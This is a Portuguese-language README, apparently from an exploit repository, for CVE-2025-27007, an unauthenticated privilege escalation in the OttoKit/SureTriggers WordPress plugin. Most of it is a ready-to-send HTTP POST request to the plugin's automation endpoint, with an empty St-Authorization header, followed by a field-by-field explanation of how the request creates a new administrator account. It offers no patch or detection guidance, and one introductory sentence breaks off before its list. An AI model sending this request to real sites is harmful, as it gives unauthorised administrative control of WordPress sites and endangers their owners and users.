
explorando o CVE-2025-27007, uma vulnerabilidade crítica de escalonamento de privilégios sem autenticação no plugin OttoKit (anteriormente SureTriggers) do WordPress
Exploração da CVE-2025-27007, uma vulnerabilidade crítica de escalação de privilégios não autorizada no plugin OttoKit (anteriormente conhecido como SureTriggers) para WordPress. Este repositório descreve como um atacante pode criar uma conta de administrador em um site WordPress vulnerável.
A vulnerabilidade pode ser explorada nas seguintes circunstâncias:
A seguinte requisição visa o endpoint /wp-json/sure-triggers/v1/automation/action para criar uma conta de administrador:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]
selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists
Endpoint: POST /wp-json/sure-triggers/v1/automation/action
St-Authorization: (vazio): Ignora a autenticação quando o plugin não está configurado.
selected_options[user_name]: Nome de usuário para a nova conta (por exemplo, new_admin).
selected_options[user_email]: E-mail para a nova conta (por exemplo, [email protected]).
selected_options[password]: Senha para a nova conta (por exemplo, StrongP@ssw0rd123).
selected_options[role]: Defina como administrator para conceder privilégios totais.
type_event: Defina como create_user_if_not_exists para acionar a criação do usuário.